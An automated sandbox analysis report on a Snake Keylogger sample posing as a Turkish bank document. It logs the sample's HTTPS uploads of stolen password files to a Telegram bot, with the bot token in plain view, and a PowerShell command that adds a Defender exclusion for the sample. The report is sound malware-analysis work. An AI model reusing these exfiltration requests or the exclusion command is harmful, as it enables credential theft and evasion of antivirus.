                                      2024-09-26 09:02:39 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 33 35 39 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35890,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341359,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      147192.168.2.449896149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:40 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd25a234bda77d
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:02:40 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 35 61 32 33 34 62 64 61 37 37 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd25a234bda77dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:40 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:40 GMT
                                      Content-Type: application/json
                                      Content-Length: 518
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:40 UTC518INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 33 36 30 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35891,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341360,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      148192.168.2.449897149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:41 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd27c57fab271e
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:02:41 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 37 63 35 37 66 61 62 32 37 31 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd27c57fab271eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:41 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:41 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:41 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 33 36 31 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35892,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341361,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      149192.168.2.449898149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:42 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd28221ff8370a
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:02:42 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 38 32 32 31 66 66 38 33 37 30 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd28221ff8370aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:45 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:45 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:45 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 33 36 35 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35893,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341365,"docu


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:04:59:01
                                      Start date:26/09/2024
                                      Path:C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe"
                                      Imagebase:0x460000
                                      File size:533'504 bytes
                                      MD5 hash:B1EF1A6CE1C1851C95CB5625BC06E69D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1741437321.0000000003869000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1741437321.0000000003869000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1741437321.0000000003869000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:04:59:03
                                      Start date:26/09/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe"
                                      Imagebase:0xae0000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:04:59:03
                                      Start date:26/09/2024
                                      Path:C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe"
                                      Imagebase:0xef0000
                                      File size:533'504 bytes
                                      MD5 hash:B1EF1A6CE1C1851C95CB5625BC06E69D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4154364843.0000000003215000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4152159317.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4152159317.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.4152159317.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4154364843.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:false

                                      General

                                      Target ID:4
                                      Start time:04:59:04
                                      Start date:26/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:7.6%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:39
                                        Total number of Limit Nodes:7
                                        execution_graph 16192 fc4668 16193 fc467a 16192->16193 16194 fc4686 16193->16194 16196 fc4779 16193->16196 16197 fc479d 16196->16197 16201 fc4888 16197->16201 16205 fc4879 16197->16205 16203 fc48af 16201->16203 16202 fc498c 16202->16202 16203->16202 16209 fc44b4 16203->16209 16206 fc48af 16205->16206 16207 fc498c 16206->16207 16208 fc44b4 CreateActCtxA 16206->16208 16208->16207 16210 fc5918 CreateActCtxA 16209->16210 16212 fc59db 16210->16212 16213 fcd588 16214 fcd58c DuplicateHandle 16213->16214 16215 fcd61e 16214->16215 16216 fcd340 16217 fcd344 GetCurrentProcess 16216->16217 16219 fcd3d8 GetCurrentThread 16217->16219 16220 fcd3d1 16217->16220 16221 fcd415 GetCurrentProcess 16219->16221 16222 fcd40e 16219->16222 16220->16219 16225 fcd44b 16221->16225 16222->16221 16223 fcd473 GetCurrentThreadId 16224 fcd4a4 16223->16224 16225->16223 16226 fcafb0 16230 fcb0a8 16226->16230 16235 fcb097 16226->16235 16227 fcafbf 16231 fcb0dc 16230->16231 16232 fcb0b9 16230->16232 16231->16227 16232->16231 16233 fcb2e0 GetModuleHandleW 16232->16233 16234 fcb30d 16233->16234 16234->16227 16236 fcb0dc 16235->16236 16237 fcb0b9 16235->16237 16236->16227 16237->16236 16238 fcb2e0 GetModuleHandleW 16237->16238 16239 fcb30d 16238->16239 16239->16227

                                        Executed Functions

                                        Function 00FCD331 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 294 fcd331-fcd33e 295 fcd344-fcd3cf GetCurrentProcess 294->295 296 fcd340-fcd343 294->296 300 fcd3d8-fcd40c GetCurrentThread 295->300 301 fcd3d1-fcd3d7 295->301 296->295 302 fcd40e-fcd414 300->302 303 fcd415-fcd449 GetCurrentProcess 300->303 301->300 302->303 305 fcd44b-fcd451 303->305 306 fcd452-fcd46d call fcd50f 303->306 305->306 309 fcd473-fcd4a2 GetCurrentThreadId 306->309 310 fcd4ab-fcd50d 309->310 311 fcd4a4-fcd4aa 309->311 311->310
                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 00FCD3BE
                                        • GetCurrentThread.KERNEL32 ref: 00FCD3FB
                                        • GetCurrentProcess.KERNEL32 ref: 00FCD438
                                        • GetCurrentThreadId.KERNEL32 ref: 00FCD491
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1740691023.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_fc0000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: 65f2b8645f1d7a5efcca5f4dcf57aa835ebb3d41da4832a085034d69e268c7c5
                                        • Instruction ID: 12335bfcda6c02ad3c7b2f1a9ef52dd3e1fa6184f214564b33dd6f5284e5e670
                                        • Opcode Fuzzy Hash: 65f2b8645f1d7a5efcca5f4dcf57aa835ebb3d41da4832a085034d69e268c7c5
                                        • Instruction Fuzzy Hash: 43518AB0D002098FDB14DFA9D948BAEBBF5EF88314F24806DE509A7350D7386844CB22
                                        Function 00FCD340 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 318 fcd340-fcd3cf GetCurrentProcess 323 fcd3d8-fcd40c GetCurrentThread 318->323 324 fcd3d1-fcd3d7 318->324 325 fcd40e-fcd414 323->325 326 fcd415-fcd449 GetCurrentProcess 323->326 324->323 325->326 328 fcd44b-fcd451 326->328 329 fcd452-fcd46d call fcd50f 326->329 328->329 332 fcd473-fcd4a2 GetCurrentThreadId 329->332 333 fcd4ab-fcd50d 332->333 334 fcd4a4-fcd4aa 332->334 334->333
                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 00FCD3BE
                                        • GetCurrentThread.KERNEL32 ref: 00FCD3FB
                                        • GetCurrentProcess.KERNEL32 ref: 00FCD438
                                        • GetCurrentThreadId.KERNEL32 ref: 00FCD491
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1740691023.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_fc0000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: 1b50d6abfc22ca0ed829be46c4c70b8edfb1b8bcad36c4b7e9f1dadf2aac6215
                                        • Instruction ID: 9bd927dd230840b1bf067febc3589302ffc825b19bd811f98a8fa49e924b4ea5
                                        • Opcode Fuzzy Hash: 1b50d6abfc22ca0ed829be46c4c70b8edfb1b8bcad36c4b7e9f1dadf2aac6215
                                        • Instruction Fuzzy Hash: 1E5179B0D002098FDB14DFA9D948BAEBBF5EF88314F24845DE119A7360D738A944CB62
                                        Function 00FCB0A8 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 363 fcb0a8-fcb0b7 364 fcb0b9-fcb0c6 call fc9b14 363->364 365 fcb0e3-fcb0e7 363->365 371 fcb0dc 364->371 372 fcb0c8 364->372 367 fcb0e9-fcb0f3 365->367 368 fcb0fb-fcb13c 365->368 367->368 374 fcb13e-fcb146 368->374 375 fcb149-fcb157 368->375 371->365 420 fcb0ce call fcb340 372->420 421 fcb0ce call fcb331 372->421 374->375 376 fcb159-fcb15e 375->376 377 fcb17b-fcb17d 375->377 379 fcb169 376->379 380 fcb160-fcb167 call fcad10 376->380 382 fcb180-fcb187 377->382 378 fcb0d4-fcb0d6 378->371 381 fcb218-fcb296 378->381 384 fcb16b-fcb179 379->384 380->384 413 fcb29c-fcb2d8 381->413 414 fcb298-fcb29b 381->414 385 fcb189-fcb191 382->385 386 fcb194-fcb19b 382->386 384->382 385->386 387 fcb19d-fcb1a5 386->387 388 fcb1a8-fcb1b1 call fcad20 386->388 387->388 394 fcb1be-fcb1c3 388->394 395 fcb1b3-fcb1bb 388->395 396 fcb1c5-fcb1cc 394->396 397 fcb1e1-fcb1ee 394->397 395->394 396->397 399 fcb1ce-fcb1de call fcad30 call fcad40 396->399 404 fcb1f0-fcb20e 397->404 405 fcb211-fcb217 397->405 399->397 404->405 415 fcb2da-fcb2dd 413->415 416 fcb2e0-fcb30b GetModuleHandleW 413->416 414->413 415->416 417 fcb30d-fcb313 416->417 418 fcb314-fcb328 416->418 417->418 420->378 421->378
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00FCB2FE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1740691023.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_fc0000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: b76f66ce132dfdb55a7dd039e2c8c8941356417c995931e6fe70fb51fb6ed647
                                        • Instruction ID: baa4c6315d5487f256b482fe3e45d92525ee6e8b4e61de09e2ab5717eb079141
                                        • Opcode Fuzzy Hash: b76f66ce132dfdb55a7dd039e2c8c8941356417c995931e6fe70fb51fb6ed647
                                        • Instruction Fuzzy Hash: 67713370A00B468FD724DF6AD552BAABBF1FF88314F04892DD48A97A40D739E945CB90
                                        Function 00FC44B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 422 fc44b4-fc59d9 CreateActCtxA 425 fc59db-fc59e1 422->425 426 fc59e2-fc5a3c 422->426 425->426 433 fc5a3e-fc5a41 426->433 434 fc5a4b-fc5a4f 426->434 433->434 435 fc5a60 434->435 436 fc5a51-fc5a5d 434->436 437 fc5a61 435->437 436->435 437->437
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 00FC59C9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1740691023.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_fc0000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: b4b9389f5f1bf39c4d57dba29b94df0ea3c3e5975f9cb1203f93ea89545606aa
                                        • Instruction ID: 28e6dc0ef4ec4e713b2a7a80f6cbd316e861d1c23113b1c5d3903f8548453afb
                                        • Opcode Fuzzy Hash: b4b9389f5f1bf39c4d57dba29b94df0ea3c3e5975f9cb1203f93ea89545606aa
                                        • Instruction Fuzzy Hash: 0D41E2B1C0061DCBDF24CFAAC985BDEBBB5BF48704F24816AD408AB251DB756946CF90
                                        Function 00FC590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 439 fc590c-fc59d9 CreateActCtxA 441 fc59db-fc59e1 439->441 442 fc59e2-fc5a3c 439->442 441->442 449 fc5a3e-fc5a41 442->449 450 fc5a4b-fc5a4f 442->450 449->450 451 fc5a60 450->451 452 fc5a51-fc5a5d 450->452 453 fc5a61 451->453 452->451 453->453
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 00FC59C9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1740691023.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_fc0000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 8cdde3726e9197b9c97eec31222fc6623cde1eadfd602e1b8acd046e9809cb2b
                                        • Instruction ID: daa5289b8dc18f1a6d610e9c08490785c96926de9ebf087bd0371a65248597f6
                                        • Opcode Fuzzy Hash: 8cdde3726e9197b9c97eec31222fc6623cde1eadfd602e1b8acd046e9809cb2b
                                        • Instruction Fuzzy Hash: DD41F2B1C00619CBDB24CFAAC985BCDBBB2BF48704F20816ED408AB251DB756946CF90
                                        Function 00FCD581 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 455 fcd581-fcd586 456 fcd58c-fcd61c DuplicateHandle 455->456 457 fcd588-fcd58b 455->457 458 fcd61e-fcd624 456->458 459 fcd625-fcd642 456->459 457->456 458->459
                                        APIs
